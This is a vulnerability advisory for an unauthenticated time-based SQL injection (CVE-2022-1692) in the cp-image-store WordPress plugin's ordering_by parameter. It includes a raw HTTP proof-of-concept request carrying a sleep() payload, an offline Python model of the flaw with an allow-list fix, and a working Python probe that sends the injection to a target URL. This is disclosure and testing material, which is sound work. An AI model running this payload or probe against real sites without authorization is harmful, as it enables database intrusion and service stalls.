cp-image-store 1.0.67 WordPress plugin SQL injection
| Field | Value |
| --- | --- |
| Date of Disclosure | May 09 2022 |
| Affected Software Type | WordPress plugin |
| CVSS 3.x Base Score | 9.8 |
| CVSS 2.0 Base Score | 7.5 |
| Reporter | Daniel Krohmer, Shi Chen |
| Link to Affected Software | https://wordpress.org/plugins/cp-image-store |
| Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-1692 |
The ordering_by query parameter in cp-image-store 1.0.67 is vulnerable to unauthenticated SQL injection. When the plugin is installed and its shortcode is placed in a blog post, the page rendering that post can be abused: an unauthenticated attacker triggers the vulnerability simply by requesting the page containing the embedded [codepeople-image-store] shortcode with an additional malformed ordering_by query parameter.
The setup step requires an admin user. Before we can launch the attack, we need to publish a post containing the affected shortcode. In the WordPress admin area, open Image Store and click on Add New to create a new post. Add the affected shortcode [codepeople-image-store] and publish the post. Use the generated permalink to access the blog post containing the shortcode.

Visit the blog post page. No authentication is required while doing this. Clicking the previous button triggers the vulnerable request. However, it needs to be slightly modified by adding ordering_by, which is the vulnerable query parameter.

A POC may look like the request shown at the end of this advisory. Ensure that the assigned value of ordering_by begins with a valid column of the wp_posts table (post_author in that request): MySQL rejects a query that references an unknown column before executing it, so the injected sleep() would never be evaluated and the delay would not be observable. The columns of wp_posts in the WordPress core schema are: ID, post_author, post_date, post_date_gmt, post_content, post_title, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping, pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count.
In the code, the vulnerability is triggered by unsanitized user input of ordering_by at line 2420. The database call that ultimately executes the injected SQL can be found at line 2467.
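To make the two points above concrete (why the PoC value must start with a real wp_posts column, and what the unsanitized ORDER BY concatenation looks like next to its fix), here is an added, self-contained Python model. It is not the plugin's code: the query shape is an assumption about the bug, the table is an in-memory SQLite stand-in for wp_posts with constructed sample rows, and a MySQL-style sleep() is registered by hand so the page's payload shape (post_author and sleep(N)) can be reproduced offline.

```python
import sqlite3
import time

# Allow-list for the hardened version. Constructed for this example; the real
# wp_posts table has more columns and the plugin's own fix (if any) may differ.
ALLOWED_ORDER_COLUMNS = ("ID", "post_author", "post_date", "post_title", "menu_order")

# Constructed sample rows (ID, post_author, post_date, post_title); not data from the page.
SAMPLE_POSTS = [
    (1, 2, "2022-05-01", "first"),
    (2, 1, "2022-05-03", "second"),
    (3, 3, "2022-05-02", "third"),
]


def make_db():
    """In-memory stand-in for wp_posts, with a sleep() that behaves like MySQL's
    (blocks for N seconds, returns 0) so time-based payloads can be observed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_author INTEGER, "
        "post_date TEXT, post_title TEXT, menu_order INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO wp_posts (ID, post_author, post_date, post_title) VALUES (?, ?, ?, ?)",
        SAMPLE_POSTS,
    )
    conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def fetch_vulnerable(conn, ordering_by):
    """Assumed shape of the bug: the raw query-string value lands inside ORDER BY.
    The database parses and evaluates whatever expression the attacker supplies."""
    sql = "SELECT ID FROM wp_posts ORDER BY " + ordering_by
    return [row[0] for row in conn.execute(sql)]


def fetch_hardened(conn, ordering_by, default="post_date"):
    """Fix: an ORDER BY identifier cannot be bound as a prepared-statement parameter,
    so the safe option is an exact-match allow-list with a fixed fallback."""
    column = ordering_by if ordering_by in ALLOWED_ORDER_COLUMNS else default
    sql = "SELECT ID FROM wp_posts ORDER BY " + column  # column is now one of our own literals
    return [row[0] for row in conn.execute(sql)]


def timed(fn, conn, ordering_by):
    """Run one of the query builders and return (ids, elapsed_seconds)."""
    start = time.monotonic()
    ids = fn(conn, ordering_by)
    return ids, time.monotonic() - start


def query_error(conn, ordering_by):
    """Return the database error text for a vulnerable-style query, or None if it ran.
    An unknown leading column fails here, before sleep() is ever evaluated."""
    try:
        fetch_vulnerable(conn, ordering_by)
    except sqlite3.OperationalError as err:
        return str(err)
    return None


if __name__ == "__main__":
    db = make_db()
    payload = "post_author and sleep(0.1)"  # same shape as the page's PoC, shorter delay
    print("legit     :", fetch_vulnerable(db, "post_author"))
    print("vulnerable:", timed(fetch_vulnerable, db, payload))  # sleep() runs once per sorted row
    print("hardened  :", timed(fetch_hardened, db, payload))    # falls back to post_date, no delay
    print("bad column:", query_error(db, "not_a_column and sleep(0.1)"))
```

Note that the delay in the vulnerable path is paid once per row being sorted, not once per query, which is why a live target may stall for a multiple of the requested seconds; the unknown-column case returns an error immediately, which is the false negative the advisory warns about when the value is not a real wp_posts column.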
The SQL injection can be triggered by sending the request below.

GET /?cpis_image=379&ordering_by=post_author+and+sleep(5) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
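The request above is a single time-based probe. To check a deployment reliably you want the same request compared against a baseline, repeated a few times, with the delay threshold chosen so that a merely slow page is not reported as injectable. The following Python script is an added example, not tooling from the reporters or the plugin: the target URL and image ID are placeholders for a test instance you control, and the column allow-list mirrors the WordPress core wp_posts schema so the probe cannot accidentally send a query that fails on an unknown column.

```python
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request

# Columns of wp_posts in the WordPress core schema; the injected expression must
# start with one of these or MySQL rejects the query before sleep() runs.
WP_POSTS_COLUMNS = (
    "ID", "post_author", "post_date", "post_date_gmt", "post_content", "post_title",
    "post_excerpt", "post_status", "comment_status", "ping_status", "post_password",
    "post_name", "to_ping", "pinged", "post_modified", "post_modified_gmt",
    "post_content_filtered", "post_parent", "guid", "menu_order", "post_type",
    "post_mime_type", "comment_count",
)


def is_wp_posts_column(name):
    return name in WP_POSTS_COLUMNS


def baseline_url(base_url, image_id):
    """The same page without ordering_by, used as the timing reference."""
    return f"{base_url.rstrip('/')}/?{urllib.parse.urlencode({'cpis_image': image_id})}"


def build_poc_url(base_url, image_id, column="post_author", delay=5):
    """URL-encoded form of the advisory's request: ordering_by=<column> and sleep(<delay>)."""
    if not is_wp_posts_column(column):
        raise ValueError(f"{column!r} is not a wp_posts column; the probe would be a false negative")
    query = urllib.parse.urlencode(
        {"cpis_image": image_id, "ordering_by": f"{column} and sleep({delay})"}
    )
    return f"{base_url.rstrip('/')}/?{query}"


def time_get(url, timeout):
    """Seconds until the response is fully read; HTTP errors still count as a timing sample."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0", "Connection": "close"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass
    return time.monotonic() - start


def looks_injectable(baseline_samples, injected_samples, delay, min_ratio=0.8):
    """Medians damp network jitter; requiring most of the requested delay keeps a
    page that is simply slow from being reported as vulnerable."""
    gap = statistics.median(injected_samples) - statistics.median(baseline_samples)
    return gap >= min_ratio * delay


def probe(base_url, image_id, delay=5, rounds=3, timeout=None):
    """Collect baseline and injected timings and return (verdict, baseline, injected)."""
    # sleep() inside ORDER BY may be evaluated once per sorted row, so allow far more than delay.
    timeout = timeout or delay * 20
    base = [time_get(baseline_url(base_url, image_id), timeout) for _ in range(rounds)]
    inj = [time_get(build_poc_url(base_url, image_id, delay=delay), timeout) for _ in range(rounds)]
    return looks_injectable(base, inj, delay), base, inj


if __name__ == "__main__":
    # Hypothetical test instance; image ID 379 is the value used in the advisory's request.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    verdict, base, inj = probe(target, 379, delay=5)
    print("baseline:", [round(t, 2) for t in base])
    print("injected:", [round(t, 2) for t in inj])
    print("time-based SQL injection indicated:", verdict)
```

Run it only against an instance you are authorized to test; because the delay is multiplied by the number of rows the query sorts, a large image store can make the injected request stall for minutes, which is also why the script reads the full response with a generous timeout rather than giving up at the nominal delay.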